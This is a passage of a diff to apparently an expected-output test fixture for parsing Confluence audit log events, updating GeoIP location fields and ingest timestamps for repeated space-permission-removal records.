removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9635,20 +9053,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9656,7 +9068,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222557094Z", + "ingested": "2021-12-14T14:34:31.513242912Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.194Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"CREATEATTACHMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9729,20 +9141,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9750,7 +9156,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222558972Z", + "ingested": "2021-12-14T14:34:31.513243304Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.188Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9816,20 +9222,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9837,7 +9237,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222560858Z", + "ingested": "2021-12-14T14:34:31.513243698Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.176Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9903,20 +9303,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -9924,7 +9318,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222562764Z", + "ingested": "2021-12-14T14:34:31.513244100Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.166Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -9997,20 +9391,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10018,7 +9406,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222564676Z", + "ingested": "2021-12-14T14:34:31.513244488Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.160Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10091,20 +9479,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10112,7 +9494,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222570852Z", + "ingested": "2021-12-14T14:34:31.513244871Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.155Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10185,20 +9567,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10206,7 +9582,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222572912Z", + "ingested": "2021-12-14T14:34:31.513245264Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.149Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEBLOG\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10272,20 +9648,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10293,7 +9663,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222574879Z", + "ingested": "2021-12-14T14:34:31.513245677Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.143Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10366,20 +9736,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10387,7 +9751,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222576773Z", + "ingested": "2021-12-14T14:34:31.513246061Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.137Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10460,20 +9824,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10481,7 +9839,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222578678Z", + "ingested": "2021-12-14T14:34:31.513246462Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.132Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVECOMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10554,20 +9912,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10575,7 +9927,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222580554Z", + "ingested": "2021-12-14T14:34:31.513246852Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.128Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10648,20 +10000,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10669,7 +10015,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222582462Z", + "ingested": "2021-12-14T14:34:31.513247239Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.122Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10742,20 +10088,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10763,7 +10103,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222584346Z", + "ingested": "2021-12-14T14:34:31.513247756Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.115Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10829,20 +10169,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10850,7 +10184,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222586433Z", + "ingested": "2021-12-14T14:34:31.513248383Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.107Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -10923,20 +10257,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -10944,7 +10272,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222588336Z", + "ingested": "2021-12-14T14:34:31.513248886Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.099Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-administrators\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"REMOVEPAGE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11017,20 +10345,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -11038,7 +10360,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222590238Z", + "ingested": "2021-12-14T14:34:31.513249375Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.091Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"SETSPACEPERMISSIONS\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -11111,20 +10433,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
